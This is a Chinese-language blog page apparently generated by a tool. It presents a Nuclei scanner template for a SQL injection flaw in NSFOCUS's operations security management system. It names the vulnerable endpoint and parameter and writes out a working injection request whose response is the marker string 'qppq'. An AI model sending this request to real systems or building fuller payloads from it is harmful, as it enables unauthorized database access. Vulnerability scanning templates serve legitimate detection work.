绿盟运维安全管理系统SQL注入漏洞

### 解析要点

  • **漏洞名称**:绿盟运维安全管理系统SQL注入漏洞

  • **端点与方法**:GET /webconf/log/getDBType

  • **注入点**:`sql` 参数

  • **PoC关键参数**:`cat=espc`、`sid=7473a85e535405e7bd991cb82b2f134c`(假设为测试用固定值)

  • **响应证据**:执行注入后返回 `qppq`(由 `CHR(113)+CHR(112)+CHR(112)+CHR(113)` 生成)

  • **严重级别**:High(SQL注入无权限限制时默认High)

  • **参考链接**:用户提供的微信文章链接

### 最终YAML模板

复制代码
```yaml
id: nsfocus-ops-security-sqli-202512290956
info:
 name: 绿盟运维安全管理系统SQL注入漏洞
 author: auto-generator
 severity: High
 description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
 tags: [web, sqli, nsfocus, vulnerability]
 reference:
 - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
 classification:
 cwe-id: CWE-89
 cve-id: ""
 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
stop-at-first-match: true
http:
 - raw:
 - |
 GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
 Host: {{Hostname}}
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
 Accept: */*
 Connection: close
 matchers-condition: and
 matchers:
 - type: status
 status:
 - 200
 - type: word
 part: body
 words:
 - "qppq"
 case-insensitive: false
``` 

**说明**:

  1. 模板采用PoC原始请求复刻,保留关键参数 `sid` 和 `cat`;

  2. 注入payload生成 `qppq` 字符串作为响应证据;

  3. 若 `sid` 为临时值,需替换为实际有效sid或通过前置请求获取;

  4. 严重级别按无权限限制SQL注入默认设为High,可根据实际CVSS调整。

  5. 符合Nuclei 3.x规范,包含必要的matchers和stop机制。

  6. 严格遵循用户需求,仅输出最终YAML模板,无多余内容。

    yaml 复制代码
    id: nsfocus-ops-security-sqli-202512290956
    
    info:
    
      name: 绿盟运维安全管理系统SQL注入漏洞
    
      author: auto-generator
    
      severity: High
    
      description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
    
      tags: [web, sqli, nsfocus, vulnerability]
    
      reference:
    
        - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
    
      classification:
    
        cwe-id: CWE-89
    
        cve-id: ""
    
        cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    
    stop-at-first-match: true
    
    http:
    
      - raw:
    
          - |
    
            GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
    
            Host: {{Hostname}}
    
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
    
            Accept: */*
    
            Connection: close
    
        matchers-condition: and
    
        matchers:
    
          - type: status
    
            status:
    
              - 200
    
          - type: word
    
            part: body
    
            words:
    
              - "qppq"
    
            case-insensitive: false
相关推荐
HABuo4 分钟前
【linux文件系统】磁盘结构&文件系统详谈
linux·运维·服务器·c语言·c++·ubuntu·centos
Howrun77724 分钟前
关于Linux服务器的协作问题
linux·运维·服务器
yunfuuwqi2 小时前
OpenClaw✅真·喂饭级教程:2026年OpenClaw(原Moltbot)一键部署+接入飞书最佳实践
运维·服务器·网络·人工智能·飞书·京东云
九河云2 小时前
5秒开服,你的应用部署还卡在“加载中”吗?
大数据·人工智能·安全·机器学习·华为云
迎仔2 小时前
C-算力中心网络隔离实施方法:怎么搞?
运维·网络
代码游侠2 小时前
C语言核心概念复习——网络协议与TCP/IP
linux·运维·服务器·网络·算法
数据知道3 小时前
PostgreSQL 故障排查:如何找出数据库中最耗时的 SQL 语句
数据库·sql·postgresql
枷锁—sha3 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
AtoposのCX3304 小时前
Docker运行hello-world镜像失败或超时
运维·docker
桌面运维家5 小时前
vDisk安全启动策略怎么应用?防止恶意引导攻击
安全